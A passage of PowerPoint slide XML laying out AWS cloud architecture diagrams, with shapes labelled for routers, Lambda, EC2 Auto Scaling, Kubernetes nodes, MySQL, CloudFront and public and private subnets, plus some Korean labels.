      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="143" name="Graphic 110"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId26"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5092309" y="4247122"/>
            <a:ext cx="437730" cy="43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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4823843" y="4659646"/>
            <a:ext cx="97693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Instance with</a:t>
            </a:r>
          </a:p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CloudWatch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="TextBox 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487329" y="3708486"/>
            <a:ext cx="68755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lvl="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Amazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166" name="Graphic 31"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId27"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2591957" y="326151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Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7310513" y="1438551"/>
            <a:ext cx="1971735" cy="4537841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="5B9CD5">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440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Availability Zone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204" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7464657" y="4306144"/>
            <a:ext cx="1677424" cy="1110300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="007CBC">
              <a:alpha val="980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Private subnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="205" name="Graphic 2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7466389" y="4302792"/>
            <a:ext cx="286251" cy="283881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206" name="Graphic 19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7464134" y="2270165"/>
            <a:ext cx="283588" cy="283588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0498139" y="208016"/>
            <a:ext cx="1511301" cy="32641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1245607" y="519428"/>
            <a:ext cx="763832" cy="159330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198333" y="739775"/>
            <a:ext cx="822220" cy="209730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="210" name="Graphic 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId31"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3621233" y="4008004"/>
            <a:ext cx="468745" cy="468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TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3455550" y="4460274"/>
            <a:ext cx="823478" cy="2717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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Lambda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="212" name="Graphic 62"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId32"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8139064" y="4674612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TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7607481" y="5053328"/>
            <a:ext cx="1378205" cy="259717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/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Amazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Kubernetes nodes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Rectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7564193" y="4625976"/>
            <a:ext cx="3965115" cy="715602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D86613"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Auto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D86613"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scaling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D86613"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="Graphic 39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7558016" y="4614365"/>
            <a:ext cx="282664" cy="278847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="217" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="202" idx="2"/>
            <a:endCxn id="204" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8020187" y="4022958"/>
            <a:ext cx="564100" cy="227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218" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="8020185" y="4015817"/>
            <a:ext cx="564100" cy="2266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40494" y="5957490"/>
            <a:ext cx="373368" cy="373368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="46217" y="6299359"/>
            <a:ext cx="597321" cy="2424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Slack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2384489" y="5172528"/>
            <a:ext cx="933322" cy="2656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SNS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="231" name="Graphic 24"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId35"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590399" y="4711291"/>
            <a:ext cx="473457" cy="47345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TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5668841" y="5247053"/>
            <a:ext cx="816218" cy="446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Lambda</a:t>
            </a:r>
          </a:p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function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="235" name="Graphic 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId36"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5865447" y="4899513"/>
            <a:ext cx="398583" cy="3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raphic 27"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId37"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3616761" y="4713916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TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3310675" y="5177876"/>
            <a:ext cx="1104844" cy="4521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EC2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Amazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Amazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Auto Scaling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="TextBox 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10058401" y="3213556"/>
            <a:ext cx="1493838" cy="430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vl="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Amazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Amazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>instance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="241" name="Graphic 53"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId38"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10557194" y="275635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Freeform 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="6934202" y="938212"/>
            <a:ext cx="1370011" cy="50482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43" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8304680" y="937747"/>
            <a:ext cx="2545382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15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="10590274" y="1192430"/>
            <a:ext cx="507875" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:headEnd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8247485" y="6197449"/>
            <a:ext cx="404846" cy="404846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="250" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9184240" y="5778306"/>
            <a:ext cx="711586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9332688" y="6218822"/>
            <a:ext cx="421776" cy="376106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="253" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8639176" y="6365873"/>
            <a:ext cx="687035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6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4279028" y="3498850"/>
            <a:ext cx="77479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6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1944686" y="3494088"/>
            <a:ext cx="609168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6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592136" y="3489325"/>
            <a:ext cx="848977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6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5169980" y="4086880"/>
            <a:ext cx="244283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6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5182306" y="3163515"/>
            <a:ext cx="244283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type="arrow" w="med" len="sm"/>
            <a:tailEnd type="arrow" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="223" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555532" y="6209251"/>
            <a:ext cx="5506357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7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5858323" y="4651291"/>
            <a:ext cx="380830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7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5582939" y="4467269"/>
            <a:ext cx="466697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7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5793296" y="5953245"/>
            <a:ext cx="530185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w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="263" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6464299" y="3509168"/>
            <a:ext cx="794670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Freeform 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="6462884" y="3644527"/>
            <a:ext cx="661022" cy="272105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67" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7125504" y="6367030"/>
            <a:ext cx="1135275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0458109" y="532766"/>
            <a:ext cx="771861" cy="401719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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0845240" y="1005677"/>
            <a:ext cx="1203884" cy="329262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="271" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5509419" y="3507581"/>
            <a:ext cx="42955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6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId43"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592366" y="2291216"/>
            <a:ext cx="448468" cy="44846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TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2704953" y="2733335"/>
            <a:ext cx="2243138" cy="446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Virtual</a:t>
            </a:r>
          </a:p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Private Cloud </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111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60" y="1545308"/>
            <a:ext cx="452296" cy="45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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCB91AC5-C76C-F545-8ADD-956FB261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995" y="1984809"/>
            <a:ext cx="9095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113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5" y="671699"/>
            <a:ext cx="445891" cy="44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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C8EDBA0-A1A3-C44F-A7D1-E699A9A21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84" y="1089930"/>
            <a:ext cx="1097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</a:p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CloudFront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72" y="3318937"/>
            <a:ext cx="381419" cy="38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TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C8EDBA0-A1A3-C44F-A7D1-E699A9A21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959" y="3712406"/>
            <a:ext cx="1135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CloudFront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Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3061520" y="3498850"/>
            <a:ext cx="619893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2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/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>라우터 작동 방식</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1285313" y="3118629"/>
            <a:ext cx="1685713" cy="1475849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8900">
              <a:alpha val="941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1E8900"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Public subnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9356104" y="3116249"/>
            <a:ext cx="1685713" cy="1475849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8900">
              <a:alpha val="941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1E8900"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Public subnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9208370" y="2288606"/>
            <a:ext cx="1971735" cy="4411513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="5B9CD5">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440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Availability Zone C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389659" y="3445272"/>
            <a:ext cx="1544491" cy="469503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="D86613">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="502920" tIns="9144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ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="D86613"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>EC2 instance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic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4964" y="3439160"/>
            <a:ext cx="284004" cy="284004"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389442" y="4028335"/>
            <a:ext cx="1544708" cy="492399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="D86613">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="502920" tIns="9144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ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="D86613"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>EC2 instance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic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647" y="4021167"/>
            <a:ext cx="286136" cy="278992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="직사각형 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1913720" y="3667626"/>
            <a:ext cx="698484" cy="26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E-class</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="직사각형 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1888195" y="4281941"/>
            <a:ext cx="833690" cy="259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종합정보</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline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Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9362515" y="5156198"/>
            <a:ext cx="1677424" cy="1110300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="007CBC">
              <a:alpha val="941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Private subnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Graphic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64247" y="5152846"/>
            <a:ext cx="286251" cy="283881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic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1993" y="3116249"/>
            <a:ext cx="279619" cy="279619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137580" y="2290986"/>
            <a:ext cx="1971735" cy="4407954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="5B9CD5">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440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Availability Zone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19" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1291724" y="5158579"/>
            <a:ext cx="1677424" cy="1110300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="007CBC">
              <a:alpha val="9410"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="dash"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50292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5B9CD5"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Private subnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
